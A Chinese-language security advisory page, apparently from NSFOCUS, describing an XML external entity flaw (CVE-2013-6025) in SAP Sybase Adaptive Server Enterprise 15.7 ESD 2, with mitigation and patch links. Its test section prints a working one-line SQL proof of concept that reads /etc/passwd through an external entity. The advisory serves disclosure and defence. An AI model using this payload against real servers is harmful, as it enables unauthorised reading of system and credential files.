SAP Sybase Adaptive Server Enterprise XML外部实体信息泄露漏洞

发布日期：2013-10-17
更新日期：2013-10-20受影响系统：
Sybase Adaptive Server Enterprise 15.7 ESD 2
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 63193
CVE（CAN） ID: CVE-2013-6025Sybase Adaptive Server Enterprise是关系型数据库管理系统。SAP Sybase Adaptive Server Enterprise 15.7 ESD 2存在XML注入漏洞，可导致信息泄露。该漏洞源于XML外部实体处理的扩展使用。XMLParse流程易于受到攻击。通过特制的SQL请求，经过身份验证的攻击者可以读取服务器文件内容。<*来源：Igor Bulatenko

链接：http://www.kb.cert.org/vuls/id/303900
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！SELECT xmlextract（"/", xmlparse（"<？xml version="1.0" standalone="yes"？><！DOCTYPE content [ <！ENTITY abc SYSTEM "/etc/passwd">]><content>&abc;</content>"））建议：
--------------------------------------------------------------------------------
临时解决方法：如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：* 禁用XXE厂商补丁：Sybase
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.sybase.com/support
http://www.sybase.com/downloadsDebian OpenSSL Bug - 后门还是安全事故？Bluetooth U "New Folder - Index"模块多个目录遍历漏洞相关资讯 Sybase Adaptive Server Enterprise

Sybase Adaptive Server （10/10/2012 08:05:53）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规